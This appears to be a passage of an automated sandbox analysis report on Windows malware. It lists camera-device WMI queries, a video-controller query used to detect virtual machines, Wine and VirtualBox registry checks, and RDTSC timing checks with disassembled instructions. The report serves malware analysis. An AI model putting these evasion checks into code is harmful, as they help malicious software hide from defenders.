Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\twain_32\1u58lIqYIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\twain_32\1u58lIqYIC.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: DE3156 second address: DE315A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F64373 second address: F6437E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F6437E second address: F64382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F64382 second address: F64388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F5AEFE second address: F5AF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F5AF08 second address: F5AF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F4E3C536593h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4E3C536590h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F63305 second address: F63309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F63309 second address: F6330F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F6330F second address: F63314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F63314 second address: F6331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F6331A second address: F6332E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3CF4808Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F6332E second address: F63332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F63332 second address: F63366 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F4E3CF48095h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4E3CF48094h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F63366 second address: F6336A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F6336A second address: F6338B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4E3CF48095h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F6338B second address: F6338F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F63AA4 second address: F63AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F63AA8 second address: F63AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F65E7D second address: F65E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F65F60 second address: F65F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F65F64 second address: F65F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F65F6A second address: F65F90 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4E3C53658Ch 0x00000008 jbe 00007F4E3C536586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4E3C536592h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F65F90 second address: F65F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F66048 second address: F660D3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4E3C536586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D1C13h] 0x00000012 push 00000000h 0x00000014 add esi, dword ptr [ebp+122D28D6h] 0x0000001a push 95970BA0h 0x0000001f jmp 00007F4E3C536596h 0x00000024 add dword ptr [esp], 6A68F4E0h 0x0000002b add esi, 580108CDh 0x00000031 and ch, 0000001Fh 0x00000034 push 00000003h 0x00000036 pushad 0x00000037 mov dx, si 0x0000003a movzx ecx, dx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F4E3C536588h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a mov edx, dword ptr [ebp+122D2085h] 0x00000060 push 00000003h 0x00000062 mov dx, 99DAh 0x00000066 push 969D2AAEh 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f ja 00007F4E3C536586h 0x00000075 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F660D3 second address: F660E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F660E4 second address: F660FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E3C536596h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F776F7 second address: F7770C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F86B7F second address: F86B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F4E3C536586h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F86B8E second address: F86BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F4E3CF48086h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F84AC4 second address: F84AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3C536599h 0x00000009 popad 0x0000000a jmp 00007F4E3C536590h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F84AF2 second address: F84AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F4E3CF48086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
